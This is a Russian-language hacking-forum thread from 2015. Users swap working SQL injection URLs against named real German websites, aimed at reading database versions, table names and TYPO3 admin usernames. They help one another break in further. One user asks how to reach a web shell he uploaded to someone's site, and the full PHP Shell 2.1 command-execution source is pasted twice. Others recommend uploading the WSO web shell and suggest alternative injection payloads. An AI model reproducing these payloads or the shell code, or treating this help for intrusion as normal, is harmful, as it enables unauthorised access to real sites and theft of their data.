ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.03.2015, 18:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+select+null,version()||chr(58)||current_user||chr(58)||current_database()+--[/COLOR][/COLOR]
Как выковырять данные be_users.username ?
PS движок типо3, эти данные там есть точно! уверены?
Код:
Code:
http://www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html
?tx_szhrksearch_pi1[xtend]=1
&tx_szhrksearch_pi1[bundesland][0]=2
&tx_szhrksearch_pi1[results_at_a_time]=100
&tx_szhrksearch_pi1[pointer]=1
&tx_szhrksearch_pi1[detail]=all
&tx_szhrksearch_pi1[besform][0]=d'+union+select+null,table_name+from+information_schema.tables--
|
|
|
13.03.2015, 16:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Здраствуйте. Помогите узнать, я на сайт кидаю шелл, но как его прочитать? Как узнать, куда на сайте заливаются файлы? В какую папку?
|
|
|
|
13.03.2015, 16:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от teh
teh said:
Здраствуйте. Помогите узнать, я на сайт кидаю шелл, но как его прочитать? Как узнать, куда на сайте заливаются файлы? В какую папку?
покажи код шела
|
|
|
|
13.03.2015, 17:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Сообщение от OxoTnik
OxoTnik said:
покажи код шела
Он не мой, скачал непомню откуда
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You can get a copy of the GNU General Public License from this address: http://www.gnu.org/copyleft/gpl.html#SEC1 You can also write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* There are no user-configurable settings in this file anymore, please see * config.php instead. */ /* This error handler will turn all notices, warnings, and errors into fatal * errors, unless they have been suppressed with the @-operator. */ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { /* The @-opertor (used with chdir() below) temporarely makes * error_reporting() return zero, and we don't want to die in that case. * We do note the error in the output, though. */ if (error_reporting() == 0) { $_SESSION['output'] .= $errstr . "\n"; } else { die(' PHP Shell 2.1 Fatal Error! ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. Please consult the README, INSTALL, and SECURITY files for instruction on how to use PHP Shell. Copyright © 2000–2005, Martin Geisler. Get the latest version at mgeisler.net/php-shell/. '); } } /* Installing our error handler makes PHP die on even the slightest problem. * This is what we want in a security critical application like this. */ set_error_handler('error_handler'); function logout() { /* Empty the session data, except for the 'authenticated' entry which the * rest of the code needs to be able to check. */ $_SESSION = array('authenticated' => false); /* Unset the client's cookie, if it has one. */ // if (isset($_COOKIE[session_name()])) // setcookie(session_name(), '', time()-42000, '/'); /* Destroy the session data on the server. This prevents the simple * replay attach where one uses the back button to re-authenticate using * the old POST data since the server wont know the session then.*/ // session_destroy(); } function stripslashes_deep($value) { if (is_array($value)) return array_map('stripslashes_deep', $value); else return stripslashes($value); } if (get_magic_quotes_gpc()) $_POST = stripslashes_deep($_POST); /* Initialize some variables we need again and again. */ $username = isset($_POST['username']) ? $_POST['username'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; $command = isset($_POST['command']) ? $_POST['command'] : ''; $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; /* Load the configuration. */ $ini = parse_ini_file('config.php', true); if (empty($ini['settings'])) $ini['settings'] = array(); /* Default settings --- these settings should always be set to something. */ $default_settings = array('home-directory' => '.'); /* Merge settings. */ $ini['settings'] = array_merge($default_settings, $ini['settings']); session_start(); /* Delete the session data if the user requested a logout. This leaves the * session cookie at the user, but this is not important since we * authenticates on $_SESSION['authenticated']. */ if (isset($_POST['logout'])) logout(); /* Attempt authentication. */ if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($ini['users'][$username])) { if (strchr($ini['users'][$username], ':') === false) { // No seperator found, assume this is a password in clear text. $_SESSION['authenticated'] = ($ini['users'][$username] == $password); } else { list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); } } /* Enforce default non-authenticated state if the above code didn't set it * already. */ if (!isset($_SESSION['authenticated'])) $_SESSION['authenticated'] = false; if ($_SESSION['authenticated']) { /* Initialize the session variables. */ if (empty($_SESSION['cwd'])) { $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); $_SESSION['history'] = array(); $_SESSION['output'] = ''; } if (!empty($command)) { /* Save the command for late use in the JavaScript. If the command is * already in the history, then the old entry is removed before the * new entry is put into the list at the front. */ if (($i = array_search($command, $_SESSION['history'])) !== false) unset($_SESSION['history'][$i]); array_unshift($_SESSION['history'], $command); /* Now append the commmand to the output. */ $_SESSION['output'] .= '$ ' . $command . "\n"; /* Initialize the current working directory. */ if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) { $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { /* The current command is a 'cd' command which we have to handle * as an internal shell command. */ if ($regs[1]{0} == '/') { /* Absolute path, we use it unchanged. */ $new_dir = $regs[1]; } else { /* Relative path, we append it to the current working * directory. */ $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; } /* Transform '/./' into '/' */ while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); /* Transform '//' into '/' */ while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); /* Transform 'x/..' into '' */ while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if ($new_dir == '') $new_dir = '/'; /* Try to change directory. */ if (@chdir($new_dir)) { $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; } } elseif (trim($command) == 'exit') { logout(); } else { /* The command is not an internal command, so we execute it after * changing the directory and save the output. */ chdir($_SESSION['cwd']); // We canot use putenv() in safe mode. if (!ini_get('safe_mode')) { // Advice programs (ls for example) of the terminal size. putenv('ROWS=' . $rows); putenv('COLUMNS=' . $columns); } /* Alias expansion. */ $length = strcspn($command, " \t"); $token = substr($command, 0, $length); if (isset($ini['aliases'][$token])) $command = $ini['aliases'][$token] . substr($command, $length); $io = array(); $p = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); /* Read output sent to stdout. */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } /* Read output sent to stderr. */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } } /* Build the command history for use in the JavaScript */ if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; } }[/COLOR][COLOR="#0000BB"]?>[/COLOR] PHP Shell 2.1 [COLOR="#0000BB"][/COLOR] var current_line = 0; var command_hist = new Array([COLOR="#0000BB"][/COLOR]); var last = 0; function key(e) { if (!e) var e = window.event; if (e.keyCode == 38 && current_line 0) { command_hist[current_line] = document.shell.command.value; current_line--; document.shell.command.value = command_hist[current_line]; } } function init() { document.shell.setAttribute("autocomplete", "off"); document.shell.output.scrollTop = document.shell.output.scrollHeight; document.shell.command.focus(); } [COLOR="#0000BB"][/COLOR] function init() { document.shell.username.focus(); } [COLOR="#0000BB"][/COLOR] PHP Shell 2.1 [/COLOR]" method="post"> [COLOR="#0000BB"][/COLOR] Authentication [COLOR="#0000BB"]Login failed, please try again:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"]; else echo[/COLOR][COLOR="#DD0000"]" Please login:\n"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR] Username: [/COLOR]"> Password: [/COLOR]"> [COLOR="#0000BB"][/COLOR] Current Working Directory: [COLOR="#0000BB"][/COLOR] [/COLOR]" rows="[COLOR="#0000BB"][/COLOR]"> [COLOR="#0000BB"][/COLOR] $ [/COLOR]" tabindex="1"> Size: [/COLOR]"> × [/COLOR]"> [COLOR="#0000BB"][/COLOR] Please consult the README, INSTALL, and SECURITY files for instruction on how to use PHP Shell. Copyright © 2000–2005, Martin Geisler. Get the latest version at mgeisler.net/php-shell/. [/COLOR]
|
|
|
|
13.03.2015, 17:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от teh
teh said:
Он не мой, скачал непомню откуда
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You can get a copy of the GNU General Public License from this address: http://www.gnu.org/copyleft/gpl.html#SEC1 You can also write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* There are no user-configurable settings in this file anymore, please see * config.php instead. */ /* This error handler will turn all notices, warnings, and errors into fatal * errors, unless they have been suppressed with the @-operator. */ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { /* The @-opertor (used with chdir() below) temporarely makes * error_reporting() return zero, and we don't want to die in that case. * We do note the error in the output, though. */ if (error_reporting() == 0) { $_SESSION['output'] .= $errstr . "\n"; } else { die(' PHP Shell 2.1 Fatal Error! ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. Please consult the README, INSTALL, and SECURITY files for instruction on how to use PHP Shell. Copyright © 2000–2005, Martin Geisler. Get the latest version at mgeisler.net/php-shell/. '); } } /* Installing our error handler makes PHP die on even the slightest problem. * This is what we want in a security critical application like this. */ set_error_handler('error_handler'); function logout() { /* Empty the session data, except for the 'authenticated' entry which the * rest of the code needs to be able to check. */ $_SESSION = array('authenticated' => false); /* Unset the client's cookie, if it has one. */ // if (isset($_COOKIE[session_name()])) // setcookie(session_name(), '', time()-42000, '/'); /* Destroy the session data on the server. This prevents the simple * replay attach where one uses the back button to re-authenticate using * the old POST data since the server wont know the session then.*/ // session_destroy(); } function stripslashes_deep($value) { if (is_array($value)) return array_map('stripslashes_deep', $value); else return stripslashes($value); } if (get_magic_quotes_gpc()) $_POST = stripslashes_deep($_POST); /* Initialize some variables we need again and again. */ $username = isset($_POST['username']) ? $_POST['username'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; $command = isset($_POST['command']) ? $_POST['command'] : ''; $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; /* Load the configuration. */ $ini = parse_ini_file('config.php', true); if (empty($ini['settings'])) $ini['settings'] = array(); /* Default settings --- these settings should always be set to something. */ $default_settings = array('home-directory' => '.'); /* Merge settings. */ $ini['settings'] = array_merge($default_settings, $ini['settings']); session_start(); /* Delete the session data if the user requested a logout. This leaves the * session cookie at the user, but this is not important since we * authenticates on $_SESSION['authenticated']. */ if (isset($_POST['logout'])) logout(); /* Attempt authentication. */ if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($ini['users'][$username])) { if (strchr($ini['users'][$username], ':') === false) { // No seperator found, assume this is a password in clear text. $_SESSION['authenticated'] = ($ini['users'][$username] == $password); } else { list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); } } /* Enforce default non-authenticated state if the above code didn't set it * already. */ if (!isset($_SESSION['authenticated'])) $_SESSION['authenticated'] = false; if ($_SESSION['authenticated']) { /* Initialize the session variables. */ if (empty($_SESSION['cwd'])) { $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); $_SESSION['history'] = array(); $_SESSION['output'] = ''; } if (!empty($command)) { /* Save the command for late use in the JavaScript. If the command is * already in the history, then the old entry is removed before the * new entry is put into the list at the front. */ if (($i = array_search($command, $_SESSION['history'])) !== false) unset($_SESSION['history'][$i]); array_unshift($_SESSION['history'], $command); /* Now append the commmand to the output. */ $_SESSION['output'] .= '$ ' . $command . "\n"; /* Initialize the current working directory. */ if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) { $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { /* The current command is a 'cd' command which we have to handle * as an internal shell command. */ if ($regs[1]{0} == '/') { /* Absolute path, we use it unchanged. */ $new_dir = $regs[1]; } else { /* Relative path, we append it to the current working * directory. */ $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; } /* Transform '/./' into '/' */ while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); /* Transform '//' into '/' */ while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); /* Transform 'x/..' into '' */ while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if ($new_dir == '') $new_dir = '/'; /* Try to change directory. */ if (@chdir($new_dir)) { $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; } } elseif (trim($command) == 'exit') { logout(); } else { /* The command is not an internal command, so we execute it after * changing the directory and save the output. */ chdir($_SESSION['cwd']); // We canot use putenv() in safe mode. if (!ini_get('safe_mode')) { // Advice programs (ls for example) of the terminal size. putenv('ROWS=' . $rows); putenv('COLUMNS=' . $columns); } /* Alias expansion. */ $length = strcspn($command, " \t"); $token = substr($command, 0, $length); if (isset($ini['aliases'][$token])) $command = $ini['aliases'][$token] . substr($command, $length); $io = array(); $p = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); /* Read output sent to stdout. */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } /* Read output sent to stderr. */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } } /* Build the command history for use in the JavaScript */ if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; } }[/COLOR][COLOR="#0000BB"]?>[/COLOR] PHP Shell 2.1 [COLOR="#0000BB"][/COLOR] var current_line = 0; var command_hist = new Array([COLOR="#0000BB"][/COLOR]); var last = 0; function key(e) { if (!e) var e = window.event; if (e.keyCode == 38 && current_line 0) { command_hist[current_line] = document.shell.command.value; current_line--; document.shell.command.value = command_hist[current_line]; } } function init() { document.shell.setAttribute("autocomplete", "off"); document.shell.output.scrollTop = document.shell.output.scrollHeight; document.shell.command.focus(); } [COLOR="#0000BB"][/COLOR] function init() { document.shell.username.focus(); } [COLOR="#0000BB"][/COLOR] PHP Shell 2.1 [/COLOR]" method="post"> [COLOR="#0000BB"][/COLOR] Authentication [COLOR="#0000BB"]Login failed, please try again:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"]; else echo[/COLOR][COLOR="#DD0000"]" Please login:\n"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR] Username: [/COLOR]"> Password: [/COLOR]"> [COLOR="#0000BB"][/COLOR] Current Working Directory: [COLOR="#0000BB"][/COLOR] [/COLOR]" rows="[COLOR="#0000BB"][/COLOR]"> [COLOR="#0000BB"][/COLOR] $ [/COLOR]" tabindex="1"> Size: [/COLOR]"> × [/COLOR]"> [COLOR="#0000BB"][/COLOR] Please consult the README, INSTALL, and SECURITY files for instruction on how to use PHP Shell. Copyright © 2000–2005, Martin Geisler. Get the latest version at mgeisler.net/php-shell/. [/COLOR]
Понятно, залей WSO и будет счастье
|
|
|
|
13.03.2015, 17:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Сообщение от OxoTnik
OxoTnik said:
Понятно, залей WSO и будет счастье
можете, пожалуйста, обьяснить или кинуть силку, что б почитать что такое WSO
|
|
|
|
13.03.2015, 18:08
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от teh
teh said:
можете, пожалуйста, обьяснить или кинуть силку, что б почитать что такое WSO
поиск пробовали? /thread103155.html
|
|
|
|
13.03.2015, 18:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Сообщение от faza02
faza02 said:
поиск пробовали? /thread103155.html
спасибо
|
|
|
|
13.03.2015, 21:00
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
http://www1.ids-mannheim.de/oea/forsch/forsch1.html?database=projekte&schlagwort=Kriegsbe richterstattung&id=0&table=swforsch+union+select+1 11,222,333,444,555,666,777,888,999,1000,1111,1222, 1333+from+information_schema.tables+--+
вывод не вижу(
блинд не крутится(
какие ещё варианты?
|
|
|
|
13.03.2015, 23:12
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
http://www1.ids-mannheim.de/oea/forsch/forsch1.html?database=projekte&schlagwort=Kriegsbe richterstattung&id=0&table=swforsch+union+select+1 11,222,333,444,555,666,777,888,999,1000,1111,1222, 1333+from+information_schema.tables+--+
вывод не вижу(
блинд не крутится(
какие ещё варианты?
Код:
Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+union+select+1,2,3,4,5,6,7,version(),9--+&id=0
может лучше так?
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
